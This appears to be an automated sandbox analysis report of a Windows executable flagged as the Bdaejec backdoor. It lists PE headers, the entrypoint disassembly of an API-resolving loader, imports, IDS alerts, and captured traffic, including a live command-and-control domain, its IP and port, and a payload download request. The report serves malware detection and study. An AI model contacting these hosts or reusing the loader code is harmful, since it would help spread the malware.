DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x547CD530 [Mon Dec 1 20:53:04 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	fc8b72cd3830d0f6a9c801b4385e1454

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 74794A54h
mov dword ptr [ebp-44h], 652E666Eh
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007FFBA8B95D15h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFEC74CCh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FFBA8B95E5Eh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FFBA8B95D64h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FFBA8B95D5Bh

Rich Headers

Programming Language:

[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 UPD3 build 30723
[RES] VS2013 build 21005
[LNK] VS2013 UPD3 build 30723

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d58a4	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x33b000	0x4810	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25cf70	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2a4f60	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25c000	0xc70	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x25941a	0x259600	6d614c1b6c91e57cc6f893e8d5353b4b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
CONST	0x25b000	0x50	0x200	9d2c259028ec9a2bead2fdb719de93b6	False	0.171875	data	1.4183627461897457	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x25c000	0x7dad2	0x7dc00	d165cf31a244df646478cfc7b91b27cf	False	0.3152025347912525	data	5.278930315697064	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2da000	0x60c90	0x15000	306075b28383012b063734f6e211a392	False	0.23208472842261904	data	3.7836579408963225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x33b000	0x4810	0x4a00	cab02b81ece1759cd51a94aca6929323	False	0.27322635135135137	data	4.038463935393645	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
A#uq	0x340000	0x5000	0x4200	e0c06908751f6768e214a43c990d414c	False	0.7772845643939394	data	6.934503720718857	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x33baa8	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4805194805194805
RT_CURSOR	0x33bbdc	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	English	United States	0.7
RT_CURSOR	0x33bc90	0x134	AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	English	United States	0.36363636363636365
RT_CURSOR	0x33bdc4	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	English	United States	0.35714285714285715
RT_CURSOR	0x33bef8	0x134	data	English	United States	0.37337662337662336
RT_CURSOR	0x33c02c	0x134	data	English	United States	0.37662337662337664
RT_CURSOR	0x33c160	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	English	United States	0.36688311688311687
RT_CURSOR	0x33c294	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	English	United States	0.37662337662337664
RT_CURSOR	0x33c3c8	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	English	United States	0.36688311688311687
RT_CURSOR	0x33c4fc	0x134	Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x33c630	0x134	data	English	United States	0.44155844155844154
RT_CURSOR	0x33c764	0x134	data	English	United States	0.4155844155844156
RT_CURSOR	0x33c898	0x134	AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	English	United States	0.5422077922077922
RT_CURSOR	0x33c9cc	0x134	data	English	United States	0.2662337662337662
RT_CURSOR	0x33cb00	0x134	data	English	United States	0.2824675324675325
RT_CURSOR	0x33cc34	0x134	data	English	United States	0.3246753246753247
RT_BITMAP	0x33cd68	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	English	United States	0.44565217391304346
RT_BITMAP	0x33ce20	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	English	United States	0.37962962962962965
RT_ICON	0x33cf64	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.24059139784946237
RT_DIALOG	0x33d24c	0xe8	data	English	United States	0.6336206896551724
RT_DIALOG	0x33d334	0x34	data	English	United States	0.9038461538461539
RT_STRING	0x33d368	0x82	StarOffice Gallery theme p, 536899072 objects, 1st n	English	United States	0.7153846153846154
RT_STRING	0x33d3ec	0x2a	data	English	United States	0.5476190476190477
RT_STRING	0x33d418	0x184	data	English	United States	0.48711340206185566
RT_STRING	0x33d59c	0x4e6	data	English	United States	0.37719298245614036
RT_STRING	0x33da84	0x264	data	English	United States	0.3333333333333333
RT_STRING	0x33dce8	0x2da	data	English	United States	0.3698630136986301
RT_STRING	0x33dfc4	0x8a	data	English	United States	0.6594202898550725
RT_STRING	0x33e050	0xac	data	English	United States	0.45348837209302323
RT_STRING	0x33e0fc	0xde	data	English	United States	0.536036036036036
RT_STRING	0x33e1dc	0x4a8	data	English	United States	0.3221476510067114
RT_STRING	0x33e684	0x228	data	English	United States	0.4003623188405797
RT_STRING	0x33e8ac	0x2c	data	English	United States	0.5227272727272727
RT_STRING	0x33e8d8	0x53c	data	English	United States	0.2947761194029851
RT_GROUP_CURSOR	0x33ee14	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States	1.0
RT_GROUP_CURSOR	0x33ee38	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ee4c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ee60	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ee74	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ee88	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ee9c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33eeb0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33eec4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33eed8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33eeec	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ef00	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ef14	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ef28	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x33ef3c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x33ef50	0x14	data	English	United States	1.2
RT_VERSION	0x33ef64	0x62c	data	English	United States	0.4917721518987342
RT_MANIFEST	0x33f590	0x280	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.553125

Imports

DLL	Import
KERNEL32.dll	lstrcmpA, GetPrivateProfileIntA, GetPrivateProfileStringA, WritePrivateProfileStringA, InitializeCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, SetThreadPriority, GetAtomNameA, FileTimeToSystemTime, GetThreadLocale, GlobalFlags, CompareStringW, GetLocaleInfoW, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetOEMCP, GetCPInfo, GetACP, GetCurrentDirectoryA, DeleteFileA, FlushFileBuffers, GetFullPathNameA, LockFile, SetEndOfFile, SetFilePointer, UnlockFile, DuplicateHandle, GetCurrentProcess, LoadLibraryExA, GetShortPathNameA, lstrcmpiA, MoveFileA, GetVolumeInformationA, GetStringTypeExA, GetWindowsDirectoryA, FileTimeToLocalFileTime, GetFileAttributesA, GetFileAttributesExA, GetFileSizeEx, GetFileTime, LocalFileTimeToFileTime, SetFileAttributesA, SetFileTime, GetTickCount, lstrcpyA, VerSetConditionMask, VerifyVersionInfoA, GetTempPathA, GetTempFileNameA, GetProfileIntA, VirtualProtect, GetDiskFreeSpaceA, ReplaceFileA, GetUserDefaultLCID, FindResourceExW, LocalLock, LocalUnlock, GetSystemTimeAsFileTime, RtlUnwind, GetCommandLineA, GetSystemInfo, VirtualAlloc, VirtualQuery, CreateThread, ExitThread, ExitProcess, GetModuleHandleExW, AreFileApisANSI, IsDebuggerPresent, IsProcessorFeaturePresent, HeapQueryInformation, SetStdHandle, GetFileType, IsValidCodePage, GetTimeZoneInformation, GetStdHandle, GetStartupInfoW, GetVersionExA, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, CreateEventW, TerminateProcess, CreateSemaphoreW, FatalAppExitA, SetConsoleCtrlHandler, GetStringTypeW, GetConsoleCP, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetDateFormatW, GetTimeFormatW, LCMapStringW, IsValidLocale, EnumSystemLocalesW, OutputDebugStringW, WriteConsoleW, CreateFileW, SetEnvironmentVariableA, CreateEventA, SetEvent, CompareStringA, GlobalGetAtomNameA, GlobalFindAtomA, GlobalAddAtomA, FindResourceA, LoadLibraryW, lstrcmpW, GlobalDeleteAtom, LoadLibraryExW, GetModuleHandleW, GetModuleFileNameW, FreeResource, GetSystemDirectoryW, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, EncodePointer, OutputDebugStringA, MultiByteToWideChar, CopyFileA, FormatMessageA, MulDiv, GlobalFree, GlobalUnlock, GlobalLock, GlobalSize, GlobalAlloc, SetLastError, ReleaseSemaphore, OpenSemaphoreA, CreateSemaphoreA, WaitForSingleObject, Sleep, SearchPathA, GetFileSize, DeviceIoControl, LocalFree, LocalAlloc, WriteFile, GetVersion, GetLocalTime, ReadFile, CloseHandle, FindNextFileA, CreateFileA, SystemTimeToFileTime, GetSystemTime, FindClose, FindFirstFileA, GetProcAddress, SetErrorMode, FreeLibrary, GetModuleHandleA, GetModuleFileNameA, GetEnvironmentVariableA, GetCurrentProcessId, GetCurrentThread, ResumeThread, QueryPerformanceCounter, SuspendThread, LoadLibraryA, WideCharToMultiByte, FindResourceW, SizeofResource, LockResource, LoadResource, DeleteCriticalSection, InitializeCriticalSectionEx, GetProcessHeap, HeapSize, HeapFree, HeapReAlloc, HeapAlloc, HeapDestroy, GetLastError, RaiseException, LocalReAlloc, DecodePointer
USER32.dll	IsRectEmpty, GetNextDlgGroupItem, MessageBeep, CreatePopupMenu, GetMenuDefaultItem, BringWindowToTop, LoadAcceleratorsA, TranslateAcceleratorA, LoadMenuA, InsertMenuItemA, SetRectEmpty, LoadImageA, GetMenuBarInfo, UnpackDDElParam, ReuseDDElParam, RegisterClipboardFormatA, DrawFocusRect, DrawIconEx, GetIconInfo, GetAsyncKeyState, EnableScrollBar, HideCaret, InvertRect, NotifyWinEvent, MapVirtualKeyA, GetKeyNameTextA, UnionRect, GetSystemMenu, SetParent, PostThreadMessageA, SetLayeredWindowAttributes, EnumDisplayMonitors, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateA, LoadImageW, DrawEdge, DrawFrameControl, SetWindowRgn, IsMenu, UpdateLayeredWindow, MonitorFromPoint, TrackMouseEvent, LoadMenuW, GetComboBoxInfo, IsZoomed, GetKeyboardLayout, IsCharLowerA, MapVirtualKeyExA, GetDCEx, LockWindowUpdate, GetKeyboardState, ToAsciiEx, LoadAcceleratorsW, CreateAcceleratorTableA, DestroyAcceleratorTable, SetCursorPos, SetClassLongA, GetDoubleClickTime, CopyIcon, SetMenuDefaultItem, ModifyMenuA, CharUpperBuffA, FrameRect, EnumChildWindows, DrawMenuBar, DefFrameProcA, DefMDIChildProcA, TranslateMDISysAccel, IsClipboardFormatAvailable, GetUpdateRect, SubtractRect, SendNotifyMessageA, InSendMessage, CreateMenu, DestroyCursor, GetWindowRgn, DrawIcon, WindowFromDC, GetTabbedTextExtentA, GetTabbedTextExtentW, RealChildWindowFromPoint, IntersectRect, InflateRect, LoadCursorA, GetSystemMetrics, MapDialogRect, SetWindowContextHelpId, GetWindowThreadProcessId, SetCursor, ShowOwnedPopups, PostQuitMessage, GetCursorPos, GetMessageA, GetDesktopWindow, GetActiveWindow, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamA, IsDialogMessageA, SetWindowTextA, ScrollWindowEx, IsWindowEnabled, SendDlgItemMessageA, IsDlgButtonChecked, CheckRadioButton, CheckDlgButton, GetDlgItemTextA, SetRect, GetDlgItemInt, SetDlgItemInt, MoveWindow, ShowWindow, GetMonitorInfoA, MonitorFromWindow, WinHelpA, GetScrollInfo, SetScrollInfo, LoadIconW, LoadIconA, CallNextHookEx, UnhookWindowsHookEx, SetWindowsHookExA, GetWindow, GetLastActivePopup, GetTopWindow, GetClassNameA, GetClassLongA, SetWindowLongA, GetWindowLongA, PtInRect, EqualRect, CopyRect, MapWindowPoints, MessageBoxA, AdjustWindowRectEx, GetWindowRect, GetClientRect, GetWindowTextLengthA, GetWindowTextA, RemovePropA, GetPropA, SetPropA, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, RedrawWindow, ValidateRect, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, UpdateWindow, TrackPopupMenuEx, TrackPopupMenu, SetMenu, GetMenu, GetCapture, GetKeyState, SetFocus, GetDlgCtrlID, GetDlgItem, IsWindowVisible, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, SetWindowPos, DestroyWindow, IsChild, IsWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, CallWindowProcA, DefWindowProcA, PostMessageA, GetMessageTime, GetMessagePos, RegisterWindowMessageA, LoadBitmapW, GetParent, SetMenuItemInfoA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, FillRect, GetSysColor, ScreenToClient, ClientToScreen, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, GetDC, TabbedTextOutA, GrayStringA, DrawTextExA, DrawTextA, RemoveMenu, AppendMenuA, InsertMenuA, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuState, GetMenuStringA, UnregisterClassA, EnableWindow, TranslateMessage, DispatchMessageA, PeekMessageA, SendMessageA, GetFocus, InvalidateRgn, CopyAcceleratorTableA, OffsetRect, CharNextA, LoadCursorW, WindowFromPoint, SetCapture, ReleaseCapture, WaitMessage, CharUpperA, DestroyIcon, IsIconic, InvalidateRect, KillTimer, SetTimer, DeleteMenu, GetDialogBaseUnits, CopyImage, SystemParametersInfoA, GetMenuItemInfoA, SetDlgItemTextA, DestroyMenu, GetSysColorBrush
GDI32.dll	CreateDCA, BitBlt, CreateBitmap, CreateCompatibleDC, CreateDIBPatternBrushPt, CreateHatchBrush, SetWindowExtEx, CreatePatternBrush, GetDeviceCaps, GetTextMetricsA, StartDocA, StartPage, EndPage, CreatePen, SetViewportOrgEx, SetViewportExtEx, PolylineTo, PolyBezierTo, ExtTextOutA, TextOutA, CreateRectRgn, CreateSolidBrush, DeleteDC, DeleteObject, Escape, ExcludeClipRect, MoveToEx, GetClipRgn, GetCurrentPositionEx, GetObjectType, GetPixel, GetStockObject, GetViewportExtEx, GetWindowExtEx, IntersectClipRect, LineTo, OffsetClipRgn, PlayMetaFile, PtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapperFlags, SetGraphicsMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetStretchBltMode, SetTextCharacterExtra, SetTextColor, SetTextAlign, SetTextJustification, PlayMetaFileRecord, GetObjectA, ExtCreatePen, SetArcDirection, SelectClipPath, PolyDraw, ArcTo, SetColorAdjustment, ModifyWorldTransform, SetWorldTransform, GetClipBox, CopyMetaFileA, DeleteMetaFile, CreateMetaFileA, CloseMetaFile, GetTextFaceA, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, GetTextExtentPoint32W, GetTextExtentPointA, ScaleWindowExtEx, CombineRgn, CreateFontIndirectA, CreateRectRgnIndirect, GetMapMode, PatBlt, SetRectRgn, DPtoLP, GetTextExtentPoint32A, GetBkColor, GetTextColor, GetRgnBox, CreateCompatibleBitmap, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, CreateFontA, GetCharWidthA, StretchDIBits, CreateDIBitmap, EnumFontFamiliesA, GetTextCharsetInfo, GetDIBits, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateEllipticRgn, Ellipse, CreatePolygonRgn, Polygon, Polyline, Rectangle, EnumFontFamiliesExA, OffsetRgn, CreateRoundRectRgn, GetCurrentObject, RoundRect, FrameRgn, PtInRegion, SetPixelV, ExtFloodFill, SetPaletteEntries, FillRgn, GetBoundsRect, GetWindowOrgEx, LPtoDP, GetViewportOrgEx, EndDoc, AbortDoc, SetAbortProc, GetROP2, GetBkMode, GetNearestColor, GetPolyFillMode, GetStretchBltMode, GetTextAlign, EnumMetaFile
COMDLG32.dll	GetOpenFileNameA
ADVAPI32.dll	RegSetValueA, RegDeleteKeyA, RegDeleteValueA, RegEnumKeyA, RegQueryValueA, RegEnumValueA, RegOpenKeyExW, RegEnumKeyExA, SetFileSecurityA, GetFileSecurityA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCloseKey
MSIMG32.dll	TransparentBlt, AlphaBlend
SHLWAPI.dll	PathStripToRootA, PathIsUNCA, PathRemoveFileSpecW, PathRemoveExtensionA, PathFindFileNameA, PathFindExtensionA, StrFormatKBSizeA
UxTheme.dll	GetWindowTheme, GetThemeSysColor, IsAppThemed, GetThemePartSize, GetCurrentThemeName, GetThemeColor, CloseThemeData, OpenThemeData, DrawThemeParentBackground, IsThemeBackgroundPartiallyTransparent, DrawThemeBackground, DrawThemeText
oledlg.dll
OLEACC.dll	LresultFromObject, CreateStdAccessibleObject, AccessibleObjectFromWindow
gdiplus.dll	GdipDeleteGraphics, GdipCreateFromHDC, GdipSetInterpolationMode, GdipDrawImageRectI, GdipDrawImageI, GdipBitmapLockBits, GdipBitmapUnlockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromFileICM, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromFile, GdipCreateBitmapFromStream, GdipCreateBitmapFromHBITMAP, GdiplusShutdown, GdipAlloc, GdipFree, GdiplusStartup, GdipCloneImage, GdipDisposeImage, GdipGetImageGraphicsContext, GdipGetImageWidth, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize
IMM32.dll	ImmGetContext, ImmGetOpenStatus, ImmReleaseContext
WINMM.dll	PlaySoundA
WINSPOOL.DRV	DocumentPropertiesA, GetJobA, OpenPrinterA, ClosePrinter
SHELL32.dll	DragFinish, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetFileInfoA, ExtractIconA, SHAddToRecentDocs, ShellExecuteA, SHGetMalloc, SHBrowseForFolderA, SHAppBarMessage, ShellExecuteExA, DragQueryFileA
ole32.dll	StgOpenStorage, StgIsStorageFile, CreateFileMoniker, OleCreateMenuDescriptor, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, OleGetClipboard, CoLockObjectExternal, RegisterDragDrop, RevokeDragDrop, CreateGenericComposite, CreateItemMoniker, WriteClassStm, OleCreate, OleCreateFromData, StgCreateDocfile, OleCreateStaticFromData, OleCreateLinkToFile, OleCreateFromFile, OleLoad, OleSave, OleSaveToStream, OleSetContainedObject, OleGetIconOfClass, GetHGlobalFromILockBytes, PropVariantCopy, OleRegGetMiscStatus, OleRegEnumVerbs, OleQueryLinkFromData, OleQueryCreateFromData, OleIsRunning, CoGetMalloc, GetRunningObjectTable, CreateDataAdviseHolder, CreateOleAdviseHolder, OleLockRunning, OleSetMenuDescriptor, DoDragDrop, CreateStreamOnHGlobal, CoRegisterMessageFilter, OleIsCurrentClipboard, OleFlushClipboard, OleSetClipboard, CoRevokeClassObject, CoRegisterClassObject, OleUninitialize, StringFromCLSID, CoTaskMemAlloc, OleInitialize, CoFreeUnusedLibraries, OleRun, CreateILockBytesOnHGlobal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CoInitializeEx, CoDisconnectObject, StringFromGUID2, CLSIDFromProgID, CLSIDFromString, CoInitialize, CoCreateInstance, CoCreateGuid, CoUninitialize, SetConvertStg, OleRegGetUserType, ReleaseStgMedium, OleDuplicateData, ReadFmtUserTypeStg, WriteFmtUserTypeStg, WriteClassStg, ReadClassStg, CreateBindCtx, CoTreatAsClass, CoTaskMemFree, OleCreateLinkFromData
OLEAUT32.dll	LoadTypeLib, SysStringLen, VariantChangeType, VariantClear, RegisterTypeLib, LoadRegTypeLib, VariantInit, SysReAllocStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayAllocDescriptor, SafeArrayAllocData, SysAllocStringLen, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayDestroy, SafeArrayRedim, SafeArrayGetDim, SafeArrayGetElemsize, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayLock, SafeArrayUnlock, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayGetElement, SafeArrayPutElement, SafeArrayCopy, SafeArrayPtrOfIndex, VariantCopy, SysAllocStringByteLen, SysStringByteLen, SafeArrayCreate, VarDateFromStr, VarCyFromStr, VarBstrFromCy, VarBstrFromDate, VarBstrFromDec, VarDecFromStr, OleCreateFontIndirect, SysAllocString, SysFreeString

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-24T22:28:23.363275+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	49362	53	192.168.2.7	1.1.1.1
2024-07-24T22:28:24.383859+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49699	799	192.168.2.7	44.221.84.105
2024-07-24T22:28:29.875738+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49700	799	192.168.2.7	44.221.84.105

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 22:28:23.967488050 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:23.972397089 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 22:28:23.972511053 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:23.977816105 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:23.983180046 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 22:28:24.383795977 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 22:28:24.383842945 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 22:28:24.383858919 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:24.383893967 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:24.385102034 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:24.390008926 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 22:28:29.435621023 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:29.441241026 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 24, 2024 22:28:29.441385984 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:29.441939116 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:29.447062016 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 24, 2024 22:28:29.875655890 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 24, 2024 22:28:29.875674963 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 24, 2024 22:28:29.875737906 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:29.893846035 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 24, 2024 22:28:29.898829937 CEST	799	49700	44.221.84.105	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 22:28:23.363275051 CEST	49362	53	192.168.2.7	1.1.1.1
Jul 24, 2024 22:28:23.960669994 CEST	53	49362	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 24, 2024 22:28:23.363275051 CEST	192.168.2.7	1.1.1.1	0x9b24	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 24, 2024 22:28:23.960669994 CEST	1.1.1.1	192.168.2.7	0x9b24	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	44.221.84.105	799	3044	C:\Users\user\AppData\Local\Temp\TJytnf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 22:28:23.977816105 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

